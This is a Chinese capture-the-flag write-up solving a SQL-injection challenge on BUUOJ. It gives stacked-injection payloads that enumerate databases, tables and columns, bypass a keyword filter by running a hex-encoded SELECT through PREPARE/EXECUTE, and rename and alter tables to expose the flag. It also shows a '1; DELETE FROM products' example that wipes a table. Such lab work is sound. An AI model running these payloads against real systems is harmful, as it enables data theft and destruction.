buuoj强网杯2019随便注

buuoj强网杯2019随便注

打开环境:

查看源码：

说明sqlmap行不通。
返回页面
依次输入：

1
1'
1'   #
1’  order by  2  #

发现可以正常显示，注入题，并且爆出了字段数。
输入select

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

过滤掉了这些关键词。

使用堆叠注入试试；

在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select * from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。

1';show databases;  #
1';show tables; #

发现堆叠注入出现了数据库名和表名

array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

目的为查询出表1919810931114514中的信息

1';show columns from `1919810931114514`;#

可知flag字段的值即为目的

解法1：
因为select被过滤了，所以先将select * from 1919810931114514进行16进制编码

再通过构造payload，得1’;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

进而得到flag

SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值，如下：
复制代码 代码如下:
SELECT @VAR1=‘Y’,@VAR2=‘N’
– 而SET要达到同样的效果，需要：
SET @VAR1=‘Y’
SET @VAR2=‘N’

prepare…from…是预处理语句，会进行编码转换。
execute用来执行由SQLPrepare创建的SQL语句

解法2：
1’;rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);#

这段代码的意思是将words表名改为words1，1919810931114514表名改为words，将现在的words表中的flag列名改为id
然后用1’ or 1=1 #得到flag